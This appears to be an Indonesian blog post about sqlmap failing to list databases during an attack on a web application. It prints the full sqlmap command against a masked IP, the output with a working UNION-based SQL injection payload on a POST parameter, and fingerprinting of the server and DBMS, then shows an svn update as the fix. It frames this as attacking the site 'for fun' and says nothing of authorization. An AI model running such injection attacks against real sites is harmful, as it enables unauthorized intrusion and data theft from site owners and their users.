Error Database on SQLMap
06.25.00
Sesuatu yang seringkali terjadi ketika menjalankan SQLMap yaitu tidak munculnya database dari web yang di enumerate, sehingga menyulitkan untuk melakukan serangan ke web tersebut. Contohnya seperti ini :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs |
sqlmap/1.0-dev (r4380) - automatic SQL injection and database takeover tool |
http://www.sqlmap.org |
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program |
[*] starting at 14:26:22 |
[14:26:22] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file |
[14:26:22] [INFO] resuming injection data from session file |
[14:26:22] [INFO] resuming back-end DBMS 'mysql 4' from session file |
[14:26:22] [INFO] testing connection to the target url |
[14:26:23] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests: |
--- |
Place: POST |
Parameter: search |
Type: UNION query |
Title: MySQL UNION query (NULL) - 1 column |
Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu |
--- |
[14:26:23] [INFO] the back-end DBMS is MySQL |
web server operating system: Linux CentOS 4 |
web application technology: PHP 4.3.9, Apache 2.0.52 |
back-end DBMS: MySQL 4 |
[14:26:23] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database |
[14:26:24] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues) |
[14:26:24] [WARNING] the SQL query provided does not return any output |
available databases [1]: |
[*] |
[14:26:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX' |
[*] shutting down at 14:26:24 |
Pada bagian yang bertanda merah seharusnya menampilkan database dari web yang di enumerate. Hal ini terjadi karena adanya crash pada database SQLMap. Cara untuk memperbaikinya dengan meng-update database SQLMap. Caranya seperti berikut ini :
root@bt:/pentest/database/sqlmap# svn update -r 4319 |
D _sqlmap.py |
U xml/payloads.xml |
U plugins/dbms/sybase/enumeration.py |
U plugins/generic/enumeration.py |
U sqlmap.conf |
U sqlmap.py |
U doc/FAQ.pdf |
U doc/README.html |
U doc/README.pdf |
U doc/THANKS |
U doc/README.sgml |
U lib/takeover/web.py |
U lib/takeover/metasploit.py |
U lib/utils/hash.py |
U lib/controller/checks.py |
U lib/controller/controller.py |
U lib/core/common.py |
U lib/core/threads.py |
U lib/core/agent.py |
U lib/core/settings.py |
U lib/core/dump.py |
U lib/core/defaults.py |
U lib/core/option.py |
U lib/core/optiondict.py |
U lib/request/connect.py |
U lib/request/comparison.py |
U lib/request/basic.py |
U lib/techniques/blind/inference.py |
U lib/techniques/union/use.py |
U lib/techniques/union/test.py |
U lib/techniques/error/use.py |
U lib/parse/cmdline.py |
D tamper/unmagicquotes.py |
Updated to revision 4319. |
Lets have some fun :D
Selamat mencoba :D
Sumber
0 komentar